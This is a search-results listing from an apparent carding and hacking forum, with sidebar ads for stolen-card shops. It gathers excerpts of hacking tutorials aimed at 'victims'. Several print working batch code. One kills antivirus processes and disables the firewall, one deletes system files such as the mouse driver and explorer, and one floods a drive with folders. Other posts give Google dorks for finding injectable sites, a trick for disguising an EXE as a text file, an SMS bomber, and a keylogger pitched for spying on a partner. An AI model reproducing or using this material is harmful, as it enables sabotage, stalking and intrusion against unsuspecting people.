Ad expire at 5 August 2024
Ad Ends 13 January 2025
Ad End 1 February 2024
Ad End 26 February 2025
ad End 25 April 2025
Ad Ends 20 January 2025
banner Expire 25 April 2025
What's new
banner Expire 15 January 2025
banner Expire 20 October 2024
UniCvv
casino
swipe store
adv exp at 23 August 2024
Carding.pw carding forum
BidenCash Shop
Kfc CLub

Search results

  1. File_closed07

    How to find the IP address and Domain Name using cmd?

    This trick will help you to find the ip of the domain How to Find? Go to Start->run->cmd now type as “nslookup domain_name” It will show the IP address of Domain.
  2. File_closed07

    Download Widestep elite Keylogger 7.0 [Free]

    You may need keylogger in this following situation: you are a caring parent and need to know whom your kids are talking to or what websites they are visiting while you’re away you are suspecting your spouse/ girlfriend or boyfriend in cheating. Key logger You may need keylogger for...
  3. File_closed07

    A simple batch program for Port Scanning

    Hi friends in this post we are going to see how to create Batch programming for port scanning. Open Notepad Paste this code: @ECHO off color 0a cd C: cls for /L %%v in (1,1,11) do telnet %1 %%v GOTO scan2 :scan2 for /L %%w in (12,1,20) do telnet %1 %%w Save it with .bat extension(for eg...
  4. File_closed07

    How to hack the Computer using Hardware Keylogger?

    So far we have seen about the Keylogger software, now i am introducing Hardware key logger to my readers. If you don’t know about key logger ,please read this article. What is Key logger? What is Malicious softwares? Drawbacks of Key logger Software: Easily detectable User can block the...
  5. File_closed07

    COMMON METHODS USED FOR WEBSITE HACKING

    Remote File Inclusion or RFI SQL injection Cross site scripting or XXS Local file inclusion or LFI Directory Traversal attack RFI: RFI stands for Remote File Inclusion and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability...
  6. File_closed07

    Introduction to Social Engineering world | Hack the people

    What is Social Engineering? Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to...
  7. File_closed07

    How to Find a vulnerable website?

    Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks. Small List of Google Dork: inurl:index.php?id= inurl:gallery.php?id= inurl:post.php?id= inurl:article?id= Download A large list of Google dork from here copy one from above...
  8. File_closed07

    Fake virus for making fun with your friends

    Hi friends, you probably don’t want to harm your friend pc but you like to fun with them. If you think so, then you can use this fake virus. Fake virus what i mean? This is not at all virus. This is not at all make any effect. It just shut down your friend system for only once and show ” your...
  9. File_closed07

    How to send the EXE file as text file?

    1. First of all You have to download the TEXT ICON PACK . You can Download It From Below: Download 2. Extract the Icon Pack to Obtain the Text Icons. 3. Open a new file, Right click – New – Shortcut Type the location of the item: “X:WINDOWSsystem32cmd.exe /c file.txt” (where stands for...
  10. File_closed07

    Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit

    First Check whether the Website is vulnerable or not( if you don’t know how to do it, read this) Or simply copy this code to google and hit enter: inurl:/portals/0 Open the home page and check any image which is located in /portals/0/ Check the location of the image. It should be located in...
  11. File_closed07

    How to disable/delete your victim’s Antivirus?

    Here i am giving you the batch program to disable or delete the antivirus in victims computer. @ echo off rem — rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard...
  12. File_closed07

    Hacking is Art of Exploitation

    Hacking is Art of Exploitation DukLoad
  13. File_closed07

    A huge list of Google Dork on Break The Security

    Hack using Google dork. Find vulnerable websites using Google dork. Download From Here Don’t you know how to use this google dork list? Read this article
  14. File_closed07

    introduction to break the security using Denial of Service attack

    WHAT IS A DENIAL OF SERVICE ATTACK? A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it...
  15. File_closed07

    Create a virus to make the computer freezed using Batch Programming

    Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school. This is for newbie. This virus is harmful for CPU. So be careful. Don’t run this in your pc or friend pc. Open a...
  16. File_closed07

    Create a virus to create a infinite folder in a drive

    Hi Hackers, this batch code will very helpful for you. This is simple and effective virus code. As usual open notepad. Copy this code to Notepad. @echo off :top md %random% goto top @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. md...
  17. File_closed07

    Tracing a website using command prompt |Hacking Tips

    Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted. Follow the below steps: 1. Start->Run->CMD ie; open Command prompt 2. Type the following command and...
  18. File_closed07

    How to fix the product expired problem in Adobe Photoshop?

    Are you getting this error while opening Photoshop CS3 or Illustrator CS3 “Product License Has Expired” 1. delete cache.db in “c:Program FilesCommon FilesAdobeAdobe PCDcache” 2. Run the adobe cs3 product 3. enter the products key for adobe cs3 product 4. set read-only attribute for “c:Program...
  19. File_closed07

    Virus to Delete mouse,explore,logoff using Batch Programming

    Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer. @echo off @if exist c:windowssystem32mouse del c:windowssystem32mouse @if exist...
  20. File_closed07

    Command Line SMS Bomber for linux users

    This Post is writtern By disk0 A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You’ll need...
Ad End 1 February 2024
Top